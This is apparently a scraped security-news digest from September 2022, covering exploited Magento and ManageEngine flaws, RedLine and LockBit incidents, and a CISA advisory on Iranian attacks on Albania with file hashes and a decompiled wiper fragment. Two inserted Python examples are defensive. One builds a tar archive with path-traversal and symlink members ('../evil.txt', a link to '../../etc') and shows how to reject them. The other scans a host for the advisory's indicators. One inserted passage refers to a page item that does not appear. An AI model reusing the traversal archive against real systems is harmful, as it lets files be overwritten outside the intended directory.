                2022-09-22 https://www.bleepingcomputer.com/news/security/critical-magento-vulnerability-targeted-in-new-surge-of-attacks/
                Researchers have observed a surge in hacking attempts targeting CVE-2022-24086, a critical Magento 2 vulnerability allowing unauthenticated attackers to execute code on unpatched sites. [...] "

                Autosummary: Image caption: Creating the malicious PHP file (Sansec). Finally, the third attack variation employs template code that executes to replace "generated/code/Magento/Framework/App/FrontController/Interceptor.php" with a malicious, backdoored version. "


                CISA warns of critical ManageEngine RCE bug used in attacks

                exploits
                2022-09-22 https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-manageengine-rce-bug-used-in-attacks/
                The Cybersecurity and Infrastructure Security Agency (CISA) has added a critical severity Java deserialization vulnerability affecting multiple Zoho ManageEngine products to its catalog of bugs exploited in the wild. [...] "

                Autosummary: Following these campaigns, the FBI and CISA issued two joint advisories (1, 2) warning of APT actors exploiting ManageEngine flaws to drop web shells on the networks of critical infrastructure orgs, including healthcare, electronics, financial services, and IT consulting industries. "


                NSA shares guidance to help secure OT/ICS critical infrastructure

                industry
                2022-09-22 https://www.bleepingcomputer.com/news/security/nsa-shares-guidance-to-help-secure-ot-ics-critical-infrastructure/
                The National Security Agency (NSA) and CISA have issued guidance on how to secure operational technology (OT) and industrial control systems (ICSs) that are part of U.S. critical infrastructure. [...] "

                Autosummary: In January, the FBI, CISA, and NSA issued a similar joint advisory, exposing multiple Russian threat groups (including APT29, APT28, and the Sandworm Team) targeting US critical infrastructure organizations. In today's advisory [PDF], you can find detailed information on how to block threat actors' attacks at every step, including attempts to collect intelligence, gain initial access, or deploy and execute malicious tools in compromised critical infrastructure systems. "


                2K games helpdesk abused to spread RedLine malware

                exploits
                2022-09-22 https://www.malwarebytes.com/blog/news/2022/09/2k-games-helpdesk-abused-to-spread-redline-malware

                Categories: News

                Tags: 2k games, redline, support

                The 2K games support helpdesk was abused to mail a link to download the RedLine infostealing malware to customers whose email address was in the system

                The post 2K games helpdesk abused to spread RedLine malware appeared first on Malwarebytes Labs.

                "

                Autosummary: Posted: September 22, 2022. On September 20, 2022, the official Twitter account for 2K Support tweeted an important message from the Customer Support team. From what we managed to put together based on the tweets and what little information 2K provided, the first email looked similar to this one (image: 2K Support request). In some cases, these were followed by a second email that looked similar to this one. "


                Phosphorus and Dewpoint collaborate to deliver a new generation of xIoT security solutions

                industry
                2022-09-22 https://www.helpnetsecurity.com/2022/09/23/phosphorus-dewpoint/

                Phosphorus has announced a partnership with Dewpoint. The IT and security solutions provider will act as a value-added reseller (VAR) for Phosphorus in the US market. The new partnership will see the two companies jointly delivering a new generation of xIoT security solutions in the US to meet growing enterprise demand for xIoT attack surface management and remediation capabilities. “xIoT security is a critical need for today’s enterprises, and these risks are left unaddressed by … More

                The post Phosphorus and Dewpoint collaborate to deliver a new generation of xIoT security solutions appeared first on Help Net Security.

                "

                Autosummary: "


                ThreatQ TDR Orchestrator addresses industry needs for simpler implementation

                industry
                2022-09-21 https://www.helpnetsecurity.com/2022/09/21/threatquotient-tdr-orchestrator/

                ThreatQuotient has released a new version of ThreatQ TDR Orchestrator, the solution for a simplified, data-driven approach to security operations. Built on the ThreatQ Platform, the continued innovation of ThreatQ TDR Orchestrator includes enhanced automation, analysis and reporting capabilities that accelerate threat detection and response across disparate systems. The latest research from ThreatQuotient, planned for full release later in 2022, shows signs that adoption of security automation is advancing, as budgets in this area are … More

                The post ThreatQ TDR Orchestrator addresses industry needs for simpler implementation appeared first on Help Net Security.

                "

                Autosummary: Atomic Automation allows for immediate action when a complex response is not needed; and Automation Packs for vulnerability prioritization, indicator enrichment, XDR, and more use cases coming soon, help users get started with common use cases quickly. "


                ActiveState Artifact Repository reduces the risk of securing Python supply chain

                government
                2022-09-21 https://www.helpnetsecurity.com/2022/09/21/activestate-artifact-repository/

                ActiveState releases ActiveState Artifact Repository to enable organizations to securely build Python dependencies directly from source code. Rather than developers importing prebuilt Python dependencies from a public repository like the Python Package Index (PyPI), or from some internal build process that may not be secured from supply chain attacks, all Python artifacts are created via ActiveState’s secure build service and stored directly in their own private ActiveState Artifact Repository for distribution, creating a closed-loop environment … More

                The post ActiveState Artifact Repository reduces the risk of securing Python supply chain appeared first on Help Net Security.

                "

                Autosummary: Rather than developers importing prebuilt Python dependencies from a public repository like the Python Package Index (PyPI), or from some internal build process that may not be secured from supply chain attacks, all Python artifacts are created via ActiveState’s secure build service and stored directly in their own private ActiveState Artifact Repository for distribution, creating a closed-loop environment that maximizes supply chain security. "


                Energy bill rebate scams spread via SMS and email

                financial industry
                2022-09-21 https://grahamcluley.com/energy-bill-rebate-scams-spread-via-sms-and-email/
                The UK’s National Cyber Security Centre (NCSC) has warned that fraudsters are sending out emails and SMS texts urging homeowners to sign up for a discount on their energy bills. "

                Autosummary: "


                US to award $1B to state, local, and territorial governments to improve cyber resilience

                government
                2022-09-21 https://www.helpnetsecurity.com/2022/09/21/us-grants-cyber-resilience/

                The US government will award $1 billion in grants to help state, local, and territorial (SLT) governments address cybersecurity risks, strengthen the cybersecurity of their critical infrastructure, and ensure cyber resilience against persistent cyber threats. “Applicants have 60 days to apply for a grant, which can be used to fund new or existing cybersecurity programs,” the US Department of Homeland Security pointed out in the announcement. About the grant program SLT governments face many challenges … More

                The post US to award $1B to state, local, and territorial governments to improve cyber resilience appeared first on Help Net Security.

                "

                Autosummary: The grantees don’t have to adopt a specific cybersecurity framework, but their plan must include how they aim to implement the following seven cybersecurity best practices: Multi-factor authentication; Enhanced logging; Data encryption for data at rest and in transit; End use of unsupported/end of life software and hardware that are accessible from the Internet; Prohibit use of known/fixed/default passwords and credentials; The ability to reconstitute systems (backups); and Migration to the .gov internet domain. "


                Why Zero Trust Should be the Foundation of Your Cybersecurity Ecosystem

                ciber
                2022-09-21 https://thehackernews.com/2022/09/why-zero-trust-should-be-foundation-of.html
                For cybersecurity professionals, it is a huge challenge to separate the “good guys” from the “villains”. In the past, most cyberattacks could simply be traced to external cybercriminals, cyberterrorists, or rogue nation-states. But not anymore. Threats from within organizations – also known as “insider threats” – are increasing and cybersecurity practitioners are feeling the pain.  Traditional "

                Autosummary: The guide explains how your organization can design a zero trust implementation strategy, select an appropriate methodology, assemble the right tools, and execute the implementation plan for successful zero trust adoption. The Growth of Zero Trust Recently, zero trust has developed a large following due to a surge in insider attacks and an increase in remote work – both of which challenge the effectiveness of traditional perimeter-based security approaches. By combining multiple defenses such as threat prevention, detection, and automated response, XDR provides a strong foundation to a zero trust strategy. "


                Unpatched 15-year old Python bug allows code execution in 350k projects

                exploits
                2022-09-21 https://www.bleepingcomputer.com/news/security/unpatched-15-year-old-python-bug-allows-code-execution-in-350k-projects/
                A vulnerability in the Python programming language that has been overlooked for 15 years is now back in the spotlight as it likely affects more than 350,000 open-source repositories and can lead to code execution. [...] "

                Autosummary: "Failure to write any safety code to sanitize the members files before calling for tarfile.extract() tarfile.extractall() results in a directory traversal vulnerability, enabling a bad actor access to the file system" - Charles McFarland, vulnerability researcher in the Trellix Advanced Threat Research team. The flaw stems from the fact that code in the extract function in Python's tarfile module explicitly trusts the information in the TarInfo object "and joins the path that is passed to the extract function and the name in the TarInfo object" (image: CVE-2007-4559 - path joining with filename; source: Trellix). Less than a week after the disclosure, a message on the Python bug tracker announced that the issue was closed, the fix being updating the documentation with a warning "that it might be dangerous to extract archives from untrusted sources." Exploiting CVE-2007-4559: In a technical blog post today, Trellix vulnerability researcher Kasimir Schulz, who rediscovered the bug, described the simple steps to exploit CVE-2007-4559 in the Windows version of Spyder IDE, an open-source cross-platform integrated development environment for scientific programming. "
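The traversal Trellix describes above (and that the Security Affairs item earlier on this page summarises) comes down to tarfile joining the destination directory with whatever name the TarInfo carries. The block below is an added example, not code from the article, from Trellix or from CPython: build_sample_archive() constructs, in memory, a tarball whose member names try the three usual escapes (a ../ component, an absolute name, and a symlink pointing outside the destination followed by a file written through it), and safe_extract() performs the check tarfile itself did not, validating each member's fully resolved path against the destination immediately before writing it. The function names and the archive contents are assumptions made for the demo. Where the interpreter ships tarfile.data_filter (Python 3.12+, and the patched 3.8 to 3.11 releases under PEP 706), the extraction additionally passes filter="data" as a second line of defence.

```python
"""Added example (not from the article, Trellix or CPython): CVE-2007-4559
in practice. build_sample_archive() constructs a tarball in memory with the
member names the bug trusts blindly; safe_extract() checks each member
against the destination right before it is written."""
import io
import os
import tarfile
import tempfile
from typing import Dict, List, Optional, Tuple


def _add(tar: tarfile.TarFile, name: str, data: bytes = b"", *, link: Optional[str] = None) -> None:
    """Add a regular file, or a symlink when link is given, under an arbitrary name."""
    info = tarfile.TarInfo(name)
    if link is not None:
        info.type = tarfile.SYMTYPE
        info.linkname = link
        tar.addfile(info)
    else:
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))


def build_sample_archive() -> bytes:
    """Constructed sample: two benign members plus the usual escape attempts."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        _add(tar, "good.txt", b"benign\n")
        _add(tar, "sub/nested.txt", b"also benign\n")
        _add(tar, "../evil.txt", b"lands next to dest, not inside it\n")  # ../ traversal
        _add(tar, "/tmp/abs.txt", b"absolute member name\n")              # absolute name
        _add(tar, "link", link="../../etc")                               # symlink out of dest
        _add(tar, "link/passwd", b"would be written through the link\n")  # ... then used
    return buf.getvalue()


def _inside(dest: str, path: str) -> bool:
    """True if path, with every symlink and .. resolved, lies under dest."""
    dest = os.path.realpath(dest)
    path = os.path.realpath(path)
    return os.path.commonpath([dest, path]) == dest


def member_is_safe(member: tarfile.TarInfo, dest: str) -> bool:
    """The check tarfile.extract() did not do: resolve the member's target (and,
    for links, the link target) and require both to stay inside dest."""
    target = os.path.join(dest, member.name)          # the join the bug trusts
    if not _inside(dest, target):
        return False
    if member.issym() or member.islnk():
        # Hard-link names are archive-relative; symlink targets are relative
        # to the link's own directory.
        base = dest if member.islnk() else os.path.dirname(target)
        if not _inside(dest, os.path.join(base, member.linkname)):
            return False
    # No devices, FIFOs or other special entries from a data archive.
    return member.isfile() or member.isdir() or member.issym() or member.islnk()


def safe_extract(data: bytes, dest: str) -> Tuple[List[str], List[str]]:
    """Extract only members that pass member_is_safe(); return (extracted, rejected)."""
    os.makedirs(dest, exist_ok=True)
    extracted: List[str] = []
    rejected: List[str] = []
    # tarfile.data_filter exists on 3.12+ and on patched 3.8-3.11 (PEP 706);
    # pass it when available as a second line of defence.
    kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar:
            # Checked immediately before writing, so symlinks that earlier
            # members already created on disk are resolved by realpath().
            if member_is_safe(member, dest):
                tar.extract(member, dest, **kwargs)
                extracted.append(member.name)
            else:
                rejected.append(member.name)
    return extracted, rejected


def demo() -> Dict[str, object]:
    """Run safe_extract() on the sample inside a scratch directory."""
    scratch = tempfile.mkdtemp(prefix="cve-2007-4559-")
    dest = os.path.join(scratch, "dest")
    extracted, rejected = safe_extract(build_sample_archive(), dest)
    return {
        "extracted": extracted,
        "rejected": rejected,
        "escaped": os.path.exists(os.path.join(scratch, "evil.txt")),
        "link_is_symlink": os.path.islink(os.path.join(dest, "link")),
    }


if __name__ == "__main__":
    print(demo())
```

Checking each member right before it is written matters: realpath() resolves symlinks that earlier members have already placed on disk, so a link accepted earlier cannot be used to redirect a later member. Running the block prints the extracted and rejected names and confirms that nothing landed outside the destination.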


                LinkedIn Smart Links abused in evasive email phishing attacks

                financial
                2022-09-21 https://www.bleepingcomputer.com/news/security/linkedin-smart-links-abused-in-evasive-email-phishing-attacks/
                Phishing actors are abusing LinkedIn"s Smart Link feature to bypass email security products and successfully redirect targeted users to phishing pages that steal login credentials. [...] "

                Autosummary: "




                Domain shadowing becoming more popular among cybercriminals

                ciber
                2022-09-21 https://www.bleepingcomputer.com/news/security/domain-shadowing-becoming-more-popular-among-cybercriminals/
                Threat analysts at Palo Alto Networks (Unit 42) discovered that the phenomenon of "domain shadowing" might be more prevalent than previously thought, uncovering 12,197 cases while scanning the web between April and June 2022. [...] "

                Autosummary: In the meantime, the threat actors are free to host C2 (command and control) addresses, phishing sites, and malware-dropping points, abusing the good reputation of the hijacked domain to bypass security checks. "


                LockBit ransomware builder leaked online by “angry developer”

                exploits ransomware
                2022-09-21 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-builder-leaked-online-by-angry-developer-/
                The LockBit ransomware operation has suffered a breach, with an allegedly disgruntled developer leaking the builder for the gang's newest encryptor. [...] "

                Autosummary: Image caption: LockBit 3.0 builder files (Source: BleepingComputer). The included "config.json" can be used to customize an encryptor, including modifying the ransom note, changing configuration options, deciding what processes and services to terminate, and even specifying the command and control server to which the encryptor will send data. "


                Malwarebytes mistakenly blocks Google, YouTube for malware

                exploits
                2022-09-21 https://www.bleepingcomputer.com/news/technology/malwarebytes-mistakenly-blocks-google-youtube-for-malware/
                Malwarebytes has addressed a false positive that was blocking users from accessing websites and services hosted on the google.com domain, including Google search and YouTube. [...] "

                Autosummary: "Once alerted to the problem, our product team resolved the issue and released an update to our web protection database (version 1.0.60360)," added Malwarebytes VP Michael Sherwood in a thread on the company's forum. "


                AA22-264A: Iranian State Actors Conduct Cyber Operations Against the Government of Albania

                government
                2022-09-21 https://us-cert.cisa.gov/ncas/alerts/aa22-264a
                Original release date: September 21, 2022

                Summary

                The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory to provide information on recent cyber operations against the Government of Albania in July and September. This advisory provides a timeline of activity observed, from initial access to execution of encryption and wiper attacks. Additional information concerning files used by the actors during their exploitation of and cyber attack against the victim organization is provided in Appendices A and B.

                In July 2022, Iranian state cyber actors—identifying as “HomeLand Justice”—launched a destructive cyber attack against the Government of Albania which rendered websites and services unavailable. An FBI investigation indicates Iranian state cyber actors acquired initial access to the victim’s network approximately 14 months before launching the destructive cyber attack, which included a ransomware-style file encryptor and disk wiping malware. The actors maintained continuous network access for approximately a year, periodically accessing and exfiltrating e-mail content.

                Between May and June 2022, Iranian state cyber actors conducted lateral movements, network reconnaissance, and credential harvesting from Albanian government networks. In July 2022, the actors launched ransomware on the networks, leaving an anti-Mujahideen E-Khalq (MEK) message on desktops. When network defenders identified and began to respond to the ransomware activity, the cyber actors deployed a version of ZeroCleare destructive malware.

                In June 2022, HomeLand Justice created a website and multiple social media profiles posting anti-MEK messages. On July 18, 2022, HomeLand Justice claimed credit for the cyber attack on Albanian government infrastructure. On July 23, 2022, Homeland Justice posted videos of the cyber attack on their website. From late July to mid-August 2022, social media accounts associated with HomeLand Justice demonstrated a repeated pattern of a "

                Autosummary: Excerpt of the advisory's appendices (file indicators and analysis notes), split by artifact as far as the extraction allows; file names are given only where the excerpt preserved them, and fields cut off in the excerpt are marked with "...".

                Details: After obtaining access to the victim environment, the actors used several .aspx webshells, pickers.aspx, error4.aspx, and ClientBin.aspx, to maintain persistence.

                As deployed, GoXML.exe encrypted all files (except those having extensions .exe, .dll, .sys, .lnk, or .lck) on the target system, leaving behind a ransom note titled How_To_Unlock_MyFiles.txt in each folder impacted.

                Decompiled fragment (wp command): RawDisk3File = (void *)toOpenRawDisk3File( arg2_WideCharStr, 0xC0000000, L"B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D"); ptrRawDiskFile = RawDisk3File; if ( RawDisk3File ) { sizeDisk = toGetDiskSize(RawDisk3File); terminal_out("Total Bytez : %lld ", sizeDisk << 9); ... The wp command also takes an additional argument as a device path to place after \RawDisk3\ in the output string.

                disable-defender.exe: File Size 292.0 KB (299008 bytes); SHA256 45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace; SHA1 e866cc6b1507f21f688ecc2ef15a64e413743da7; MD5 60afb1e62ac61424a542b8c7b4d2cf01; SSDeep 6144:t2WhikbJZc+Wrbe/t1zT/p03BuGJ1oh7ISCLun:t2WpZnW+/tVoJ1ouQ (Ver 1.1); Filetype PE32+ executable (console) x86-64, for MS Windows; PEtype EXE; PE Header Timestamp 2021-10-24 15:07:32; ImpHash 74a6ef9e7b49c71341e439022f643c8e

                rwdsk.sys: File Size 38.84 KB (39776 bytes); SHA256 3c9dc8ada56adf9cebfc501a2d3946680dcb0534a137e2e27a7fcb5994cd9de6; SHA1 5e061701b14faf9adec9dd0b2423ff3cfc18764b; MD5 8f6e7653807ebb57ecc549cef991d505

                Unnamed PE32+ executable (console) x86-64, for MS Windows: SHA1 f22a7ec80fbfdc4d8ed796119c76bfac01e0a908; MD5 7b71764236f244ae971742ee1bc6b098; SSDeep 3072:vv2ADi7yOcE/YMBSZ0fZX4kpK1OhJrDwM:vv2jeQ/flfZbKM (Ver 1.1); PE Header Timestamp 2022-07-15 13:26:28; ImpHash 58d51c1152817ca3dec77f2eee52cbef

                Unnamed PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows: SSDeep 768:+OFu8Q3w6QzfR5Jni6SQD7qSFDs6P93/q0XIc/UB5EPABWX:RFu8QAFzffJui79f13/AnB5EPAkX (Ver 1.1); PE Header Timestamp 2016-04-30 17:08:19; ImpHash 5b2ce9270beea5915ec9adbcd0dbb070; Cert #0 Subject C=KW, L=Salmiya, O=Kuwait Telecommunications Company KSC, OU=Kuwait Telecommunications Company, CN=Kuwait Telecommunications Company KSC; Cert #0 Issuer C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Assured ID Code Signing CA; Cert #0 ...

                Unnamed PE32+ executable (native) x86-64, for MS Windows, PEtype Driver: SSDeep 768:E31ySCpoCbXnfDbEaJSooKIDyE9aBazWlEAusxsia:0gyCb3MFKIHO4Ausxta (Ver 1.1); PE Header Timestamp 2016-03-18 14:44:54; ImpHash e233f2cdc91faafe1467d9e52f166213; Cert #0 Subject CN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US; Cert #0 Issuer CN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US; Cert #0 ...

                Unnamed JPEG image data (Exif standard; TIFF image data, big-endian, direntries=13, height=1752, bps=0, PhotometricIntepretation=CMYK, orientation=upper-left, width=2484; progressive, precision 8, 2484x1752, components 4): SSDeep 12288:ME0p1RE70zxntT/ylTyaaSMn2fS+0M6puxKfJbDKrCxMe5fPSC2tmxVjpJT/n37p:MHyUt7yQaaPXS6pjar+MwrjpJ7VIbZg (Ver 1.1); Software: ...

                Code-signing chain fragments (file not named in the excerpt): ... For authorized use only, CN=VeriSign Class 3 Public Primary Certification Authority - G5; Cert #2 Issuer C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Code Verification Root; Cert #2 SHA1 57534ccc33914c41f70e2cbb2103a1db18817d8b; Cert #3 Subject C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA; Cert #3 Issuer C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. ...; ... SHA1 382c18388fb326221dfd7a77ee874f9ba60e04bf; Cert #1 Subject C=US, ST=California, L=SANTA CLARA, O=NVIDIA Corporation, CN=NVIDIA Corporation; Cert #1 Issuer C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA; Cert #1 SHA1 30632ea310114105969d0bda28fdce267104754f; Cert #2 Subject C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 ...

                Note: CISA's Cyber Hygiene Services (CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector critical infrastructure organizations.

                Revisions: September 21, 2022. "
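The excerpt above names two artifacts with full SHA-256 values (disable-defender.exe and rwdsk.sys) and describes what GoXML.exe leaves behind: a note named How_To_Unlock_MyFiles.txt in every folder it touched, with files carrying the extensions .exe, .dll, .sys, .lnk and .lck left alone. As an added example, not tooling from CISA or the FBI, the block below turns those into a first-pass host triage: it walks a tree, lists folders holding the ransom note, counts files the encryptor would and would not have touched, and hashes every regular file against the SHA-256 set. The two hashes are copied from the advisory excerpt; the function names and the sample directory built in demo() are constructed for the demonstration, and demo() adds the hash of one planted file to the set so the hash-matching path runs without a real malware sample.

```python
"""Added example (not tooling from CISA or the FBI): first-pass host triage for
the indicators quoted from AA22-264A above. Walks a tree, lists folders that
hold the GoXML.exe ransom note, counts files the encryptor would and would not
have touched, and hashes regular files against a SHA-256 set."""
import hashlib
import os
import tempfile
from typing import Dict, Iterable, List, Set

RANSOM_NOTE = "How_To_Unlock_MyFiles.txt"

# SHA-256 values copied from the advisory excerpt.
KNOWN_BAD_SHA256: Set[str] = {
    "45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace",  # disable-defender.exe
    "3c9dc8ada56adf9cebfc501a2d3946680dcb0534a137e2e27a7fcb5994cd9de6",  # rwdsk.sys
}

# Extensions the advisory says GoXML.exe left alone.
SKIPPED_EXT = {".exe", ".dll", ".sys", ".lnk", ".lck"}


def sha256_of(path: str) -> str:
    """Stream a file through SHA-256 without loading it whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root: str, bad_hashes: Iterable[str] = KNOWN_BAD_SHA256) -> Dict[str, object]:
    """Return folders with the ransom note, hash matches, and file counts."""
    bad = {h.lower() for h in bad_hashes}
    note_dirs: List[str] = []
    hash_hits: List[str] = []
    encryptable = skipped = 0
    for dirpath, _dirs, files in os.walk(root):
        if RANSOM_NOTE in files:
            note_dirs.append(os.path.relpath(dirpath, root))
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue  # do not follow links out of the scanned tree
            ext = os.path.splitext(name)[1].lower()
            if ext in SKIPPED_EXT:
                skipped += 1
            elif name != RANSOM_NOTE:
                encryptable += 1
            if sha256_of(full) in bad:
                hash_hits.append(os.path.relpath(full, root))
    return {
        "note_dirs": sorted(note_dirs),
        "hash_hits": sorted(hash_hits),
        "encryptable_files": encryptable,
        "skipped_files": skipped,
    }


def demo() -> Dict[str, object]:
    """Build a constructed sample tree and scan it. The hash of one planted
    file is added to the set so the hash path runs without a real sample."""
    root = tempfile.mkdtemp(prefix="aa22-264a-triage-")
    layout = {
        "Users/alice/Documents/report.docx": b"would have been encrypted",
        "Users/alice/Documents/How_To_Unlock_MyFiles.txt": b"ransom note",
        "Users/alice/tool.exe": b"MZ skipped by the encryptor",
        "Windows/Temp/dropper.bin": b"planted stand-in for a known-bad binary",
        "Windows/Temp/How_To_Unlock_MyFiles.txt": b"ransom note",
        "Windows/System32/clean.sys": b"benign driver stand-in",
    }
    for rel, content in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(content)
    planted = hashlib.sha256(layout["Windows/Temp/dropper.bin"]).hexdigest()
    return scan_tree(root, KNOWN_BAD_SHA256 | {planted})


if __name__ == "__main__":
    print(demo())
```

On a real host the note-bearing folders give the blast radius of the encryptor and the skipped-extension count a quick sanity check that the pattern matches what the advisory describes; the hash set is the place to drop the remaining appendix values once they have been tied to file names.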


                Scammers send fake "Energy Bills Support Scheme" texts

                financial industry
                2022-09-21 https://www.malwarebytes.com/blog/news/2022/09/energy-scammers-send-fake-energy-bills-support-scheme-texts

                Categories: News

                Tags: scam

                Tags: phish

                Tags: SMS

                Tags: energy

                Tags: fake

                Tags: website

                Tags: £400

                Watch out for an energy-themed scam being sent out via SMS which plays on energy price fears.

                (Read more...)

                The post Scammers send fake "Energy Bills Support Scheme" texts appeared first on Malwarebytes Labs.

                "

                Autosummary: First it asks potential victims to enter a variety of personal information: name, date of birth, phone number, address, city, postcode. Once this is done, the site asks for your current energy supplier, and provides a list of pre-fills. Card security code. It also places the logo of whichever company you’ve selected at the top of the page, along with the following message: This should be the account linked to your [business name] account. "


                Vector Capital invests $100 million in Malwarebytes to improve cyberprotection for organizations

                exploits
                2022-09-21 https://www.helpnetsecurity.com/2022/09/22/vector-capital-malwarebytes/

                Vector Capital announced it will make a strategic $100 million minority investment in Malwarebytes. As part of the transaction, Vector Capital Managing Directors Sandy Gill and Dave Fishman will join the company’s Board of Directors. Malwarebytes plans to leverage the investment to further innovate the company’s product portfolios, accelerate momentum with channel partners and consolidate its ownership structure. Malwarebytes will add intuitive new features to its award-winning consumer protection and privacy suite and continue to … More

                The post Vector Capital invests $100 million in Malwarebytes to improve cyberprotection for organizations appeared first on Help Net Security.

                "

                Autosummary: “Vector Capital’s investment is a testament to the transformational work our team has done to evolve our best-in-class endpoint protection to comprehensive offerings for both individuals and organizations, while driving profitable growth,” said Marcin Kleczynski, co-founder and CEO of Malwarebytes. "


                Take cybersecurity out to where employees and data are coming together

                ciber
                2022-09-20 https://www.helpnetsecurity.com/2022/09/20/networking-security/

                Every morning, we wake up and chances are, we start immediately accessing and consuming information. Whether it’s accessing personal emails, downloading sales reports, or paying bills, we’re switching devices constantly, and are used to managing both our personal and work lives from anywhere. Cybercriminals are keenly aware that users are constantly switching between personal and corporate devices, or even blurring the lines between the two. Thanks to cloud technologies, we’ve made huge convenience and productivity … More

                The post Take cybersecurity out to where employees and data are coming together appeared first on Help Net Security.

                "

                Autosummary: The typical organization has likely established a series of ad hoc systems and multiple vendors to manage its security, so adopting a SASE architecture, even if it is done gradually, allows organizations to streamline their processes and reduce their spending on several individual point products. Whether it’s accessing personal emails, downloading sales reports, or paying bills, we’re switching devices constantly, and are used to managing both our personal and work lives from anywhere. "


                IT giants warn of ongoing Chromeloader malware campaigns

                exploits
                2022-09-20 https://securityaffairs.co/wordpress/135949/malware/chromeloader-malware-campaigns.html

                VMware and Microsoft are warning of a widespread Chromeloader malware campaign that distributes several malware families. ChromeLoader is a malicious Chrome browser extension; it is classified as a pervasive browser hijacker that modifies browser settings to redirect user traffic. The malware is able to redirect the user’s traffic and hijack user search queries to popular […]

                The post IT giants warn of ongoing Chromeloader malware campaigns appeared first on Security Affairs.

                "

                Autosummary: "


                Revolut data breach: 50,000+ users affected

                financial
                2022-09-20 https://www.helpnetsecurity.com/2022/09/20/revolut-data-breach-phishing/

                Revolut, the fintech company behind the popular banking app of the same name, has suffered a data breach, which has been followed by phishing attacks aimed at taking advantage of the situation. About the Revolut data breach Revolut customers began noticing something was wrong on September 11, when some of them reported receiving “inappropriate wording via chat.” A few days later, some users received an alert via email saying their account was affected following a … More

                The post Revolut data breach: 50,000+ users affected appeared first on Help Net Security.

                "

                Autosummary: This data includes names, addresses, email addresses, telephone numbers, part of the payment card data (part of it was “masked”), and account details. "


                Russian Sandworm Hackers Impersonate Ukrainian Telecoms to Distribute Malware

                exploits
                2022-09-20 https://thehackernews.com/2022/09/russian-sandworm-hackers-impersonate.html
                A threat cluster linked to the Russian nation-state actor tracked as Sandworm has continued its targeting of Ukraine with commodity malware by masquerading as telecom providers, new findings show. Recorded Future said it discovered new infrastructure belonging to UAC-0113 that mimics operators like Datagroup and EuroTransTelecom to deliver payloads such as Colibri loader and Warzone RAT. The "

                Autosummary: Embedded within the ISO file, which was created on August 5, 2022, are three files, including an LNK file that tricks the victim into activating the infection sequence, resulting in the deployment of both Colibri loader and Warzone RAT to the target machine. "


                American Airlines disclosed a data breach

                financial
                2022-09-20 https://securityaffairs.co/wordpress/135963/data-breach/american-airlines-data-breach.html

                American Airlines disclosed a data breach, threat actors had access to an undisclosed number of employee email accounts. American Airlines recently suffered a data breach, threat actors compromised a limited number of employee email accounts. The intruders had access to sensitive personal information contained in the accounts, but the company’s data breach notification states that it is not aware […]

                The post American Airlines disclosed a data breach appeared first on Security Affairs.

                "

                Autosummary: Exposed data includes name, date of birth, mailing address, phone number, email address, driver’s license number, passport number, and/or certain medical information provided by the impacted individuals. "


                Game dev 2K’s support site hacked to push malware via fake tickets

                exploits
                2022-09-20 https://www.bleepingcomputer.com/news/security/game-dev-2k-s-support-site-hacked-to-push-malware-via-fake-tickets/
                Hackers have compromised the support system of American video game publisher 2K and now are sending support tickets to gamers containing the RedLine password-stealing malware. [...] "

                Autosummary: RedLine Stealer is an information-stealing malware that attempts to steal a wide variety of data, including browser history, browser cookies, saved browser passwords, credit cards, VPN passwords, IM content, system information, and cryptocurrency wallets. "


                Top 8 takeaways from the VMWare Cybersecurity Threat Report

                ciber
                2022-09-20 https://www.bleepingcomputer.com/news/security/top-8-takeaways-from-the-vmware-cybersecurity-threat-report/
                VMware has recently released the 2022 edition of its annual Global Incident Response Threat Report. It is critically important for IT professionals to understand these trends and what they could mean for your organization's cyber security efforts. Let's break down VMware's 8 key findings and offer meaningful insights into each. [...] "

                Autosummary: 5. 23% of attacks now compromise API security as these platforms emerge as a promising new endpoint for threat actors to exploit. The VMware study also found that attackers are increasingly exploiting APIs, as well as using tried and true techniques such as SQL injections. Zero-day exploits were encountered by 62 percent of respondents in the past 12 months, an 11 percent increase from last year. Zero-day exploits can be hugely problematic for any organization since they are impossible to anticipate. Virtual patching, also known as vulnerability shielding, involves using a Web Application Firewall or similar tool to disrupt an attacker’s network path, thereby shielding the vulnerability. "


                Windows 11 22H2 adds kernel exploit protection to security baseline

                exploits
                2022-09-20 https://www.bleepingcomputer.com/news/microsoft/windows-11-22h2-adds-kernel-exploit-protection-to-security-baseline/
                Microsoft has released the final version of security configuration baseline settings for Windows 11, version 22H2, downloadable today using the Microsoft Security Compliance Toolkit. [...] "

                Autosummary: Several new settings are enabled under Administrative Templates\Printers to protect enterprises, including "Configure RPC over TCP port," support for "RedirectionGuard," the enforcement of TCP for the "Configure RPC connection" and "Configure RPC listener settings." "


                Hive ransomware claims attack on New York Racing Association

                exploits ransomware
